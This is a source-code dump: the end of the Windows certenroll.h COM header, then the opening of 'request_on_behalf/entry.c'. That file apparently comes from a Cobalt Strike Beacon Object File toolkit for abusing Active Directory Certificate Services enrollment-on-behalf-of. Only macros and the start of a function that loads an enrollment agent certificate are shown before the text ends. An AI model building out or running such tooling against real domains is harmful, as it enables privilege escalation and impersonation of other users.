            /* [in] */ __RPC__in BSTR strCACertificateThumbprint);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeForPending )( 
            __RPC__in IX509SCEPEnrollmentHelper * This,
            /* [in] */ __RPC__in BSTR strServerUrl,
            /* [in] */ __RPC__in BSTR strRequestHeaders,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strTransactionId);
        
        HRESULT ( STDMETHODCALLTYPE *Enroll )( 
            __RPC__in IX509SCEPEnrollmentHelper * This,
            /* [in] */ X509SCEPProcessMessageFlags ProcessFlags,
            /* [retval][out] */ __RPC__out X509SCEPDisposition *pDisposition);
        
        HRESULT ( STDMETHODCALLTYPE *FetchPending )( 
            __RPC__in IX509SCEPEnrollmentHelper * This,
            /* [in] */ X509SCEPProcessMessageFlags ProcessFlags,
            /* [retval][out] */ __RPC__out X509SCEPDisposition *pDisposition);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_X509SCEPEnrollment )( 
            __RPC__in IX509SCEPEnrollmentHelper * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509SCEPEnrollment **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ResultMessageText )( 
            __RPC__in IX509SCEPEnrollmentHelper * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX509SCEPEnrollmentHelperVtbl;

    interface IX509SCEPEnrollmentHelper
    {
        CONST_VTBL struct IX509SCEPEnrollmentHelperVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509SCEPEnrollmentHelper_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509SCEPEnrollmentHelper_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509SCEPEnrollmentHelper_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509SCEPEnrollmentHelper_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509SCEPEnrollmentHelper_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509SCEPEnrollmentHelper_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509SCEPEnrollmentHelper_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509SCEPEnrollmentHelper_Initialize(This,strServerUrl,strRequestHeaders,pRequest,strCACertificateThumbprint)	\
    ( (This)->lpVtbl -> Initialize(This,strServerUrl,strRequestHeaders,pRequest,strCACertificateThumbprint) ) 

#define IX509SCEPEnrollmentHelper_InitializeForPending(This,strServerUrl,strRequestHeaders,Context,strTransactionId)	\
    ( (This)->lpVtbl -> InitializeForPending(This,strServerUrl,strRequestHeaders,Context,strTransactionId) ) 

#define IX509SCEPEnrollmentHelper_Enroll(This,ProcessFlags,pDisposition)	\
    ( (This)->lpVtbl -> Enroll(This,ProcessFlags,pDisposition) ) 

#define IX509SCEPEnrollmentHelper_FetchPending(This,ProcessFlags,pDisposition)	\
    ( (This)->lpVtbl -> FetchPending(This,ProcessFlags,pDisposition) ) 

#define IX509SCEPEnrollmentHelper_get_X509SCEPEnrollment(This,ppValue)	\
    ( (This)->lpVtbl -> get_X509SCEPEnrollment(This,ppValue) ) 

#define IX509SCEPEnrollmentHelper_get_ResultMessageText(This,pValue)	\
    ( (This)->lpVtbl -> get_ResultMessageText(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509SCEPEnrollmentHelper_INTERFACE_DEFINED__ */



#ifndef __CERTENROLLLib_LIBRARY_DEFINED__
#define __CERTENROLLLib_LIBRARY_DEFINED__

/* library CERTENROLLLib */
/* [helpstring][version][uuid] */ 

typedef 
enum X509CertificateTemplateGeneralFlag
    {
        GeneralMachineType	= 0x40,
        GeneralCA	= 0x80,
        GeneralCrossCA	= 0x800,
        GeneralDefault	= 0x10000,
        GeneralModified	= 0x20000,
        GeneralDonotPersist	= 0x1000
    } 	X509CertificateTemplateGeneralFlag;

typedef 
enum X509CertificateTemplateEnrollmentFlag
    {
        EnrollmentIncludeSymmetricAlgorithms	= 0x1,
        EnrollmentPendAllRequests	= 0x2,
        EnrollmentPublishToKRAContainer	= 0x4,
        EnrollmentPublishToDS	= 0x8,
        EnrollmentAutoEnrollmentCheckUserDSCertificate	= 0x10,
        EnrollmentAutoEnrollment	= 0x20,
        EnrollmentDomainAuthenticationNotRequired	= 0x80,
        EnrollmentPreviousApprovalValidateReenrollment	= 0x40,
        EnrollmentUserInteractionRequired	= 0x100,
        EnrollmentAddTemplateName	= 0x200,
        EnrollmentRemoveInvalidCertificateFromPersonalStore	= 0x400,
        EnrollmentAllowEnrollOnBehalfOf	= 0x800,
        EnrollmentAddOCSPNoCheck	= 0x1000,
        EnrollmentReuseKeyOnFullSmartCard	= 0x2000,
        EnrollmentNoRevocationInfoInCerts	= 0x4000,
        EnrollmentIncludeBasicConstraintsForEECerts	= 0x8000,
        EnrollmentPreviousApprovalKeyBasedValidateReenrollment	= 0x10000,
        EnrollmentCertificateIssuancePoliciesFromRequest	= 0x20000,
        EnrollmentSkipAutoRenewal	= 0x40000
    } 	X509CertificateTemplateEnrollmentFlag;

typedef 
enum X509CertificateTemplateSubjectNameFlag
    {
        SubjectNameEnrolleeSupplies	= 0x1,
        SubjectNameRequireDirectoryPath	= 0x80000000,
        SubjectNameRequireCommonName	= 0x40000000,
        SubjectNameRequireEmail	= 0x20000000,
        SubjectNameRequireDNS	= 0x10000000,
        SubjectNameAndAlternativeNameOldCertSupplies	= 0x8,
        SubjectAlternativeNameEnrolleeSupplies	= 0x10000,
        SubjectAlternativeNameRequireDirectoryGUID	= 0x1000000,
        SubjectAlternativeNameRequireUPN	= 0x2000000,
        SubjectAlternativeNameRequireEmail	= 0x4000000,
        SubjectAlternativeNameRequireSPN	= 0x800000,
        SubjectAlternativeNameRequireDNS	= 0x8000000,
        SubjectAlternativeNameRequireDomainDNS	= 0x400000
    } 	X509CertificateTemplateSubjectNameFlag;

typedef 
enum X509CertificateTemplatePrivateKeyFlag
    {
        PrivateKeyRequireArchival	= 0x1,
        PrivateKeyExportable	= 0x10,
        PrivateKeyRequireStrongKeyProtection	= 0x20,
        PrivateKeyRequireAlternateSignatureAlgorithm	= 0x40,
        PrivateKeyRequireSameKeyRenewal	= 0x80,
        PrivateKeyUseLegacyProvider	= 0x100,
        PrivateKeyEKTrustOnUse	= 0x200,
        PrivateKeyEKValidateCert	= 0x400,
        PrivateKeyEKValidateKey	= 0x800,
        PrivateKeyAttestNone	= 0,
        PrivateKeyAttestPreferred	= 0x1000,
        PrivateKeyAttestRequired	= 0x2000,
        PrivateKeyAttestMask	= 0x3000,
        PrivateKeyAttestWithoutPolicy	= 0x4000,
        PrivateKeyServerVersionMask	= 0xf0000,
        PrivateKeyServerVersionShift	= 16,
        PrivateKeyHelloKspKey	= 0x100000,
        PrivateKeyHelloLogonKey	= 0x200000,
        PrivateKeyClientVersionMask	= 0xf000000,
        PrivateKeyClientVersionShift	= 24
    } 	X509CertificateTemplatePrivateKeyFlag;


EXTERN_C const IID LIBID_CERTENROLLLib;

EXTERN_C const CLSID CLSID_CObjectId;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2000-217d-11da-b2a4-000e7bbb2b09")
CObjectId;
#endif

EXTERN_C const CLSID CLSID_CObjectIds;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2001-217d-11da-b2a4-000e7bbb2b09")
CObjectIds;
#endif

EXTERN_C const CLSID CLSID_CBinaryConverter;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2002-217d-11da-b2a4-000e7bbb2b09")
CBinaryConverter;
#endif

EXTERN_C const CLSID CLSID_CX500DistinguishedName;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2003-217d-11da-b2a4-000e7bbb2b09")
CX500DistinguishedName;
#endif

EXTERN_C const CLSID CLSID_CCspInformation;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2007-217d-11da-b2a4-000e7bbb2b09")
CCspInformation;
#endif

EXTERN_C const CLSID CLSID_CCspInformations;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2008-217d-11da-b2a4-000e7bbb2b09")
CCspInformations;
#endif

EXTERN_C const CLSID CLSID_CCspStatus;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2009-217d-11da-b2a4-000e7bbb2b09")
CCspStatus;
#endif

EXTERN_C const CLSID CLSID_CX509PublicKey;

#ifdef __cplusplus

class DECLSPEC_UUID("884e200b-217d-11da-b2a4-000e7bbb2b09")
CX509PublicKey;
#endif

EXTERN_C const CLSID CLSID_CX509PrivateKey;

#ifdef __cplusplus

class DECLSPEC_UUID("884e200c-217d-11da-b2a4-000e7bbb2b09")
CX509PrivateKey;
#endif

EXTERN_C const CLSID CLSID_CX509EndorsementKey;

#ifdef __cplusplus

class DECLSPEC_UUID("11A25A1D-B9A3-4EDD-AF83-3B59ADBED361")
CX509EndorsementKey;
#endif

EXTERN_C const CLSID CLSID_CX509Extension;

#ifdef __cplusplus

class DECLSPEC_UUID("884e200d-217d-11da-b2a4-000e7bbb2b09")
CX509Extension;
#endif

EXTERN_C const CLSID CLSID_CX509Extensions;

#ifdef __cplusplus

class DECLSPEC_UUID("884e200e-217d-11da-b2a4-000e7bbb2b09")
CX509Extensions;
#endif

EXTERN_C const CLSID CLSID_CX509ExtensionKeyUsage;

#ifdef __cplusplus

class DECLSPEC_UUID("884e200f-217d-11da-b2a4-000e7bbb2b09")
CX509ExtensionKeyUsage;
#endif

EXTERN_C const CLSID CLSID_CX509ExtensionEnhancedKeyUsage;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2010-217d-11da-b2a4-000e7bbb2b09")
CX509ExtensionEnhancedKeyUsage;
#endif

EXTERN_C const CLSID CLSID_CX509ExtensionTemplateName;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2011-217d-11da-b2a4-000e7bbb2b09")
CX509ExtensionTemplateName;
#endif

EXTERN_C const CLSID CLSID_CX509ExtensionTemplate;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2012-217d-11da-b2a4-000e7bbb2b09")
CX509ExtensionTemplate;
#endif

EXTERN_C const CLSID CLSID_CAlternativeName;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2013-217d-11da-b2a4-000e7bbb2b09")
CAlternativeName;
#endif

EXTERN_C const CLSID CLSID_CAlternativeNames;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2014-217d-11da-b2a4-000e7bbb2b09")
CAlternativeNames;
#endif

EXTERN_C const CLSID CLSID_CX509ExtensionAlternativeNames;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2015-217d-11da-b2a4-000e7bbb2b09")
CX509ExtensionAlternativeNames;
#endif

EXTERN_C const CLSID CLSID_CX509ExtensionBasicConstraints;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2016-217d-11da-b2a4-000e7bbb2b09")
CX509ExtensionBasicConstraints;
#endif

EXTERN_C const CLSID CLSID_CX509ExtensionSubjectKeyIdentifier;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2017-217d-11da-b2a4-000e7bbb2b09")
CX509ExtensionSubjectKeyIdentifier;
#endif

EXTERN_C const CLSID CLSID_CX509ExtensionAuthorityKeyIdentifier;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2018-217d-11da-b2a4-000e7bbb2b09")
CX509ExtensionAuthorityKeyIdentifier;
#endif

EXTERN_C const CLSID CLSID_CSmimeCapability;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2019-217d-11da-b2a4-000e7bbb2b09")
CSmimeCapability;
#endif

EXTERN_C const CLSID CLSID_CSmimeCapabilities;

#ifdef __cplusplus

class DECLSPEC_UUID("884e201a-217d-11da-b2a4-000e7bbb2b09")
CSmimeCapabilities;
#endif

EXTERN_C const CLSID CLSID_CX509ExtensionSmimeCapabilities;

#ifdef __cplusplus

class DECLSPEC_UUID("884e201b-217d-11da-b2a4-000e7bbb2b09")
CX509ExtensionSmimeCapabilities;
#endif

EXTERN_C const CLSID CLSID_CPolicyQualifier;

#ifdef __cplusplus

class DECLSPEC_UUID("884e201c-217d-11da-b2a4-000e7bbb2b09")
CPolicyQualifier;
#endif

EXTERN_C const CLSID CLSID_CPolicyQualifiers;

#ifdef __cplusplus

class DECLSPEC_UUID("884e201d-217d-11da-b2a4-000e7bbb2b09")
CPolicyQualifiers;
#endif

EXTERN_C const CLSID CLSID_CCertificatePolicy;

#ifdef __cplusplus

class DECLSPEC_UUID("884e201e-217d-11da-b2a4-000e7bbb2b09")
CCertificatePolicy;
#endif

EXTERN_C const CLSID CLSID_CCertificatePolicies;

#ifdef __cplusplus

class DECLSPEC_UUID("884e201f-217d-11da-b2a4-000e7bbb2b09")
CCertificatePolicies;
#endif

EXTERN_C const CLSID CLSID_CX509ExtensionCertificatePolicies;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2020-217d-11da-b2a4-000e7bbb2b09")
CX509ExtensionCertificatePolicies;
#endif

EXTERN_C const CLSID CLSID_CX509ExtensionMSApplicationPolicies;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2021-217d-11da-b2a4-000e7bbb2b09")
CX509ExtensionMSApplicationPolicies;
#endif

EXTERN_C const CLSID CLSID_CX509Attribute;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2022-217d-11da-b2a4-000e7bbb2b09")
CX509Attribute;
#endif

EXTERN_C const CLSID CLSID_CX509Attributes;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2023-217d-11da-b2a4-000e7bbb2b09")
CX509Attributes;
#endif

EXTERN_C const CLSID CLSID_CX509AttributeExtensions;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2024-217d-11da-b2a4-000e7bbb2b09")
CX509AttributeExtensions;
#endif

EXTERN_C const CLSID CLSID_CX509AttributeClientId;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2025-217d-11da-b2a4-000e7bbb2b09")
CX509AttributeClientId;
#endif

EXTERN_C const CLSID CLSID_CX509AttributeRenewalCertificate;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2026-217d-11da-b2a4-000e7bbb2b09")
CX509AttributeRenewalCertificate;
#endif

EXTERN_C const CLSID CLSID_CX509AttributeArchiveKey;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2027-217d-11da-b2a4-000e7bbb2b09")
CX509AttributeArchiveKey;
#endif

EXTERN_C const CLSID CLSID_CX509AttributeArchiveKeyHash;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2028-217d-11da-b2a4-000e7bbb2b09")
CX509AttributeArchiveKeyHash;
#endif

EXTERN_C const CLSID CLSID_CX509AttributeOSVersion;

#ifdef __cplusplus

class DECLSPEC_UUID("884e202a-217d-11da-b2a4-000e7bbb2b09")
CX509AttributeOSVersion;
#endif

EXTERN_C const CLSID CLSID_CX509AttributeCspProvider;

#ifdef __cplusplus

class DECLSPEC_UUID("884e202b-217d-11da-b2a4-000e7bbb2b09")
CX509AttributeCspProvider;
#endif

EXTERN_C const CLSID CLSID_CCryptAttribute;

#ifdef __cplusplus

class DECLSPEC_UUID("884e202c-217d-11da-b2a4-000e7bbb2b09")
CCryptAttribute;
#endif

EXTERN_C const CLSID CLSID_CCryptAttributes;

#ifdef __cplusplus

class DECLSPEC_UUID("884e202d-217d-11da-b2a4-000e7bbb2b09")
CCryptAttributes;
#endif

EXTERN_C const CLSID CLSID_CCertProperty;

#ifdef __cplusplus

class DECLSPEC_UUID("884e202e-217d-11da-b2a4-000e7bbb2b09")
CCertProperty;
#endif

EXTERN_C const CLSID CLSID_CCertProperties;

#ifdef __cplusplus

class DECLSPEC_UUID("884e202f-217d-11da-b2a4-000e7bbb2b09")
CCertProperties;
#endif

EXTERN_C const CLSID CLSID_CCertPropertyFriendlyName;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2030-217d-11da-b2a4-000e7bbb2b09")
CCertPropertyFriendlyName;
#endif

EXTERN_C const CLSID CLSID_CCertPropertyDescription;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2031-217d-11da-b2a4-000e7bbb2b09")
CCertPropertyDescription;
#endif

EXTERN_C const CLSID CLSID_CCertPropertyAutoEnroll;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2032-217d-11da-b2a4-000e7bbb2b09")
CCertPropertyAutoEnroll;
#endif

EXTERN_C const CLSID CLSID_CCertPropertyRequestOriginator;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2033-217d-11da-b2a4-000e7bbb2b09")
CCertPropertyRequestOriginator;
#endif

EXTERN_C const CLSID CLSID_CCertPropertySHA1Hash;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2034-217d-11da-b2a4-000e7bbb2b09")
CCertPropertySHA1Hash;
#endif

EXTERN_C const CLSID CLSID_CCertPropertyKeyProvInfo;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2036-217d-11da-b2a4-000e7bbb2b09")
CCertPropertyKeyProvInfo;
#endif

EXTERN_C const CLSID CLSID_CCertPropertyArchived;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2037-217d-11da-b2a4-000e7bbb2b09")
CCertPropertyArchived;
#endif

EXTERN_C const CLSID CLSID_CCertPropertyBackedUp;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2038-217d-11da-b2a4-000e7bbb2b09")
CCertPropertyBackedUp;
#endif

EXTERN_C const CLSID CLSID_CCertPropertyEnrollment;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2039-217d-11da-b2a4-000e7bbb2b09")
CCertPropertyEnrollment;
#endif

EXTERN_C const CLSID CLSID_CCertPropertyRenewal;

#ifdef __cplusplus

class DECLSPEC_UUID("884e203a-217d-11da-b2a4-000e7bbb2b09")
CCertPropertyRenewal;
#endif

EXTERN_C const CLSID CLSID_CCertPropertyArchivedKeyHash;

#ifdef __cplusplus

class DECLSPEC_UUID("884e203b-217d-11da-b2a4-000e7bbb2b09")
CCertPropertyArchivedKeyHash;
#endif

EXTERN_C const CLSID CLSID_CCertPropertyEnrollmentPolicyServer;

#ifdef __cplusplus

class DECLSPEC_UUID("884e204c-217d-11da-b2a4-000e7bbb2b09")
CCertPropertyEnrollmentPolicyServer;
#endif

EXTERN_C const CLSID CLSID_CSignerCertificate;

#ifdef __cplusplus

class DECLSPEC_UUID("884e203d-217d-11da-b2a4-000e7bbb2b09")
CSignerCertificate;
#endif

EXTERN_C const CLSID CLSID_CX509NameValuePair;

#ifdef __cplusplus

class DECLSPEC_UUID("884e203f-217d-11da-b2a4-000e7bbb2b09")
CX509NameValuePair;
#endif

EXTERN_C const CLSID CLSID_CCertificateAttestationChallenge;

#ifdef __cplusplus

class DECLSPEC_UUID("1362ADA1-EB60-456A-B6E1-118050DB741B")
CCertificateAttestationChallenge;
#endif

EXTERN_C const CLSID CLSID_CX509CertificateRequestPkcs10;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2042-217d-11da-b2a4-000e7bbb2b09")
CX509CertificateRequestPkcs10;
#endif

EXTERN_C const CLSID CLSID_CX509CertificateRequestCertificate;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2043-217d-11da-b2a4-000e7bbb2b09")
CX509CertificateRequestCertificate;
#endif

EXTERN_C const CLSID CLSID_CX509CertificateRequestPkcs7;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2044-217d-11da-b2a4-000e7bbb2b09")
CX509CertificateRequestPkcs7;
#endif

EXTERN_C const CLSID CLSID_CX509CertificateRequestCmc;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2045-217d-11da-b2a4-000e7bbb2b09")
CX509CertificateRequestCmc;
#endif

EXTERN_C const CLSID CLSID_CX509Enrollment;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2046-217d-11da-b2a4-000e7bbb2b09")
CX509Enrollment;
#endif

EXTERN_C const CLSID CLSID_CX509EnrollmentWebClassFactory;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2049-217d-11da-b2a4-000e7bbb2b09")
CX509EnrollmentWebClassFactory;
#endif

EXTERN_C const CLSID CLSID_CX509EnrollmentHelper;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2050-217d-11da-b2a4-000e7bbb2b09")
CX509EnrollmentHelper;
#endif

EXTERN_C const CLSID CLSID_CX509MachineEnrollmentFactory;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2051-217d-11da-b2a4-000e7bbb2b09")
CX509MachineEnrollmentFactory;
#endif

EXTERN_C const CLSID CLSID_CX509EnrollmentPolicyActiveDirectory;

#ifdef __cplusplus

class DECLSPEC_UUID("91f39027-217f-11da-b2a4-000e7bbb2b09")
CX509EnrollmentPolicyActiveDirectory;
#endif

EXTERN_C const CLSID CLSID_CX509EnrollmentPolicyWebService;

#ifdef __cplusplus

class DECLSPEC_UUID("91f39028-217f-11da-b2a4-000e7bbb2b09")
CX509EnrollmentPolicyWebService;
#endif

EXTERN_C const CLSID CLSID_CX509PolicyServerListManager;

#ifdef __cplusplus

class DECLSPEC_UUID("91f39029-217f-11da-b2a4-000e7bbb2b09")
CX509PolicyServerListManager;
#endif

EXTERN_C const CLSID CLSID_CX509PolicyServerUrl;

#ifdef __cplusplus

class DECLSPEC_UUID("91f3902a-217f-11da-b2a4-000e7bbb2b09")
CX509PolicyServerUrl;
#endif

EXTERN_C const CLSID CLSID_CX509CertificateTemplateADWritable;

#ifdef __cplusplus

class DECLSPEC_UUID("8336E323-2E6A-4a04-937C-548F681839B3")
CX509CertificateTemplateADWritable;
#endif

EXTERN_C const CLSID CLSID_CX509CertificateRevocationListEntry;

#ifdef __cplusplus

class DECLSPEC_UUID("884e205e-217d-11da-b2a4-000e7bbb2b09")
CX509CertificateRevocationListEntry;
#endif

EXTERN_C const CLSID CLSID_CX509CertificateRevocationListEntries;

#ifdef __cplusplus

class DECLSPEC_UUID("884e205f-217d-11da-b2a4-000e7bbb2b09")
CX509CertificateRevocationListEntries;
#endif

EXTERN_C const CLSID CLSID_CX509CertificateRevocationList;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2060-217d-11da-b2a4-000e7bbb2b09")
CX509CertificateRevocationList;
#endif

EXTERN_C const CLSID CLSID_CX509SCEPEnrollment;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2061-217d-11da-b2a4-000e7bbb2b09")
CX509SCEPEnrollment;
#endif

EXTERN_C const CLSID CLSID_CX509SCEPEnrollmentHelper;

#ifdef __cplusplus

class DECLSPEC_UUID("884e2062-217d-11da-b2a4-000e7bbb2b09")
CX509SCEPEnrollmentHelper;
#endif
#endif /* __CERTENROLLLib_LIBRARY_DEFINED__ */

/* interface __MIDL_itf_certenroll_0000_0100 */
/* [local] */ 

#ifdef __cplusplus
extern "C" {
#endif /* __cplusplus */
typedef 
enum ImportPFXFlags
    {
        ImportNone	= 0,
        ImportMachineContext	= 0x1,
        ImportForceOverwrite	= 0x2,
        ImportSilent	= 0x4,
        ImportSaveProperties	= 0x8,
        ImportExportable	= 0x10,
        ImportExportableEncrypted	= 0x20,
        ImportNoUserProtected	= 0x40,
        ImportUserProtected	= 0x80,
        ImportUserProtectedHigh	= 0x100,
        ImportInstallCertificate	= 0x200,
        ImportInstallChain	= 0x400,
        ImportInstallChainAndRoot	= 0x800
    } 	ImportPFXFlags;

#ifdef __WINCRYPT_H__
typedef HRESULT (FNIMPORTPFXTOPROVIDER)(
            _In_ HWND hWndParent,
            _In_reads_bytes_(cbPFX) BYTE const *pbPFX,
            _In_ DWORD cbPFX,
            _In_ ImportPFXFlags ImportFlags,
            _In_opt_ PCWSTR pwszPassword,
            _In_opt_ PCWSTR pwszProviderName,
            _In_opt_ PCWSTR pwszReaderName,
            _In_opt_ PCWSTR pwszContainerNamePrefix,
            _In_opt_ PCWSTR pwszPin,
            _In_opt_ PCWSTR pwszFriendlyName,
            _Out_opt_ DWORD *pcCertOut,
            _Outptr_opt_result_buffer_(*pcCertOut) PCCERT_CONTEXT **prgpCertOut);
typedef VOID (FNIMPORTPFXTOPROVIDERFREEDATA)(
            _In_ DWORD cCert,
            _In_reads_opt_(cCert) PCCERT_CONTEXT *rgpCert);
FNIMPORTPFXTOPROVIDER ImportPFXToProvider;
FNIMPORTPFXTOPROVIDERFREEDATA ImportPFXToProviderFreeData;
#endif // __WINCRYPT_H__
#ifdef __cplusplus
}
#endif  /* __cplusplus */
#endif /* WINAPI_FAMILY_PARTITION(WINAPI_PARTITION_DESKTOP) */
#pragma endregion


extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0100_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0100_v0_0_s_ifspec;

/* Additional Prototypes for ALL interfaces */

unsigned long             __RPC_USER  BSTR_UserSize(     __RPC__in unsigned long *, unsigned long            , __RPC__in BSTR * ); 
unsigned char * __RPC_USER  BSTR_UserMarshal(  __RPC__in unsigned long *, __RPC__inout_xcount(0) unsigned char *, __RPC__in BSTR * ); 
unsigned char * __RPC_USER  BSTR_UserUnmarshal(__RPC__in unsigned long *, __RPC__in_xcount(0) unsigned char *, __RPC__out BSTR * ); 
void                      __RPC_USER  BSTR_UserFree(     __RPC__in unsigned long *, __RPC__in BSTR * ); 

unsigned long             __RPC_USER  VARIANT_UserSize(     __RPC__in unsigned long *, unsigned long            , __RPC__in VARIANT * ); 
unsigned char * __RPC_USER  VARIANT_UserMarshal(  __RPC__in unsigned long *, __RPC__inout_xcount(0) unsigned char *, __RPC__in VARIANT * ); 
unsigned char * __RPC_USER  VARIANT_UserUnmarshal(__RPC__in unsigned long *, __RPC__in_xcount(0) unsigned char *, __RPC__out VARIANT * ); 
void                      __RPC_USER  VARIANT_UserFree(     __RPC__in unsigned long *, __RPC__in VARIANT * ); 

unsigned long             __RPC_USER  BSTR_UserSize64(     __RPC__in unsigned long *, unsigned long            , __RPC__in BSTR * ); 
unsigned char * __RPC_USER  BSTR_UserMarshal64(  __RPC__in unsigned long *, __RPC__inout_xcount(0) unsigned char *, __RPC__in BSTR * ); 
unsigned char * __RPC_USER  BSTR_UserUnmarshal64(__RPC__in unsigned long *, __RPC__in_xcount(0) unsigned char *, __RPC__out BSTR * ); 
void                      __RPC_USER  BSTR_UserFree64(     __RPC__in unsigned long *, __RPC__in BSTR * ); 

unsigned long             __RPC_USER  VARIANT_UserSize64(     __RPC__in unsigned long *, unsigned long            , __RPC__in VARIANT * ); 
unsigned char * __RPC_USER  VARIANT_UserMarshal64(  __RPC__in unsigned long *, __RPC__inout_xcount(0) unsigned char *, __RPC__in VARIANT * ); 
unsigned char * __RPC_USER  VARIANT_UserUnmarshal64(__RPC__in unsigned long *, __RPC__in_xcount(0) unsigned char *, __RPC__out VARIANT * ); 
void                      __RPC_USER  VARIANT_UserFree64(     __RPC__in unsigned long *, __RPC__in VARIANT * ); 

/* end of Additional Prototypes */

#ifdef __cplusplus
}
#endif

#endif




================================================
FILE: AD-BOF/ADCS-BOF/src/request_on_behalf/entry.c
================================================
#include <windows.h>
#include <stdio.h>
#include <oleauto.h>
#include <wchar.h>
#include <stdlib.h>
#include <combaseapi.h>
#include "beacon.h"
#include "bofdefs.h"
#include "base.c"
#include "CertCli.h"
#include "CertPol.h"
#include "certenroll.h"

#define SAFE_RELEASE( interfacepointer )	\
	if ( (interfacepointer) != NULL )	\
	{	\
		(interfacepointer)->lpVtbl->Release(interfacepointer);	\
		(interfacepointer) = NULL;	\
	}
#define SAFE_SYS_FREE( string_ptr )	\
	if ( (string_ptr) != NULL )	\
	{	\
		OLEAUT32$SysFreeString(string_ptr);	\
		(string_ptr) = NULL;	\
	}
#define SAFE_INT_FREE( int_ptr ) \
	if (int_ptr) \
	{ \
		intFree(int_ptr); \
		int_ptr = NULL; \
	}

#define CHECK_RETURN_FAIL(function, result) \
	if (FAILED(result)) \
	{ \
		BeaconPrintf(CALLBACK_ERROR, "%s failed: 0x%08lx\n", function, result); \
		goto fail; \
	}

#define CHECK_RETURN_FALSE(function, result) \
	if (FALSE == (BOOL)result) \
	{ \
		result = KERNEL32$GetLastError(); \
		BeaconPrintf(CALLBACK_ERROR, "%s failed: %lu\n", function, (DWORD)result); \
		result = HRESULT_FROM_WIN32(result); \
		goto fail; \
	}

#define CHECK_RETURN_NULL(function, return_value, result) \
	if (NULL == return_value) \
	{ \
		result = E_INVALIDARG; \
		BeaconPrintf(CALLBACK_ERROR, "%s failed\n", function); \
		goto fail; \
	}

#define PRIVATE_KEY_LENGTH 2048

HCERTSTORE LoadEnrollmentAgentCert(LPBYTE pbCert, DWORD cbCert, LPCWSTR wszPassword, PCCERT_CONTEXT *ppCert)
{
	CRYPT_DATA_BLOB pfxData;
	HCERTSTORE hPfxStore = NULL;
	HCERTSTORE hCertStore = NULL;
	PCCERT_CONTEXT pCert = NULL;
	PCCERT_CONTEXT pStoreCert = NULL;

	// Validate input
	if (!pbCert || cbCert == 0 || !ppCert) {
		BeaconPrintf(CALLBACK_ERROR, "LoadEnrollmentAgentCert: invalid input (pbCert=%p, cbCert=%lu)\n", pbCert, cbCert);
		return NULL;
	}

	pfxData.cbData = cbCert;
	pfxData.pbData = pbCert;
	*ppCert = NULL;

	// Open the user's MY store
